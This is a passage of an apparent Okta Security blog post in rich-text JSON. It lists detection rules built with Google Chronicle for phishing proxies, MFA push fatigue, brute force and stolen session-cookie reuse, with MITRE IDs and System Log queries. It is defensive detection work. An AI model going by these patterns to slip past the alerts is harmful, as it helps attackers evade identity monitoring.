No thanks, we’ll take that sturdy block of Swiss each and every time.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Of course, given how thin most security teams are spread, robust layering is often easier said than done. Not every security team has the luxury of dedicated Detection Engineers to craft, research and develop custom logic to catch threat actor activity, and not every security team has the time and skill to synthesize and recreate our logic in other SIEM platforms. With this in mind, Okta Security \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"recently published a number of our bespoke detections\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“But,” quoth the game show hosts, “ that’s not all!” Today we’re excited to share that Chronicle and Okta have been collaborating to help these detections reach an even wider audience. And this time around, the Chronicle team threw a few extra slices of cheese on top!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Not only did they rewrite these detections for their environment, they also did their own research and wrote additional detections. You can read more about each of them over at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.googlecloudcommunity.com/gc/Community-Blog/Better-Together-Detecting-Suspicious-Okta-Events-with-Google/ba-p/721331\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle’s blog\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
We’ve described them below too.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To channel the words of Oprah, “You get a new detection, and you get a new detection, and you get a new detection!”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Phishing Detection with FastPass Origin Check\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1566/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1566\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 
identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_phishing_detection_with_fastpass_origin_check.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_phishing_detection_with_fastpass_origin_check\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provides a platform detection for when a user enrolled in FastPass fails to authenticate via a real-time AiTM phishing proxy.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detecting Real-Time Phishing 
Attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND result eq \\\"FAILURE\\\" AND outcome.reason eq \\\"FastPass declined phishing attempt\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Successful MFA After Multiple Failures\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\
"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Access\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_mfa_brute_force_attack.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_mfa_brute_force_attack\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detects a successful login after multiple failed MFA pushes\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta 
Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/pushfatigueworkflows\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using Workflows to Respond to Anomalous Push Requests\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Repeated MFA Rejections by User\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\
":\"text\",\"value\":\"Brute Force\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_rejected_multiple_push_notifications.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_rejected_multiple_push_notifications\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects when an Okta user rejects more than 2 Push notifications in a 10 minute window.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/pushfatigueworkflows\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using Workflows to Respond to Anomalous Push 
Requests\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND outcome.result=\\\"FAILURE\\\" and outcome.reason=\\\"INVALID_CREDENTIALS\\\" and debugContext.debugData.factor eq \\\"OKTA_VERIFY_PUSH\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Classic Engine\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq  \\\"user.mfa.okta_verify.deny_push\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Use of an Okta Session 
Cookie\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1539/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1539\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Steal Web Session Cookie\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 
identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_suspicious_use_of_a_session_cookie.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_suspicious_use_of_a_session_cookie\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detects when an adversary attempts to reuse a stolen web session cookie in a different device that has a different OS, IP, Browser or User Agent.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/sessioncookietheft\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Defending against Session 
Hijacking\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Failed Number Challenge\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1621/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1621\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-Factor Authentication Request Generation\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 
identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_failed_number_challenge_during_push_notification.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_failed_number_challenge_during_push_notification\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detects when an Okta user failed a number challenge during push notification.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Number-Challenge-for-Okta-Verify\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Number Challenge for Okta 
Verify\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mismatch Between Source and Response for Verify Push Request\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1621\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1621\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-Factor Authentication Request Generation\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 
identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_mismatch_between_source_and_response_for_verify_push_request.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_mismatch_between_source_and_response_for_verify_push_request\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Mismatch Between Source and Response for Verify Push Request\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Splunk Combine to Detect Common 
Attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple Failed Users with Invalid Credentials from the same IP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid 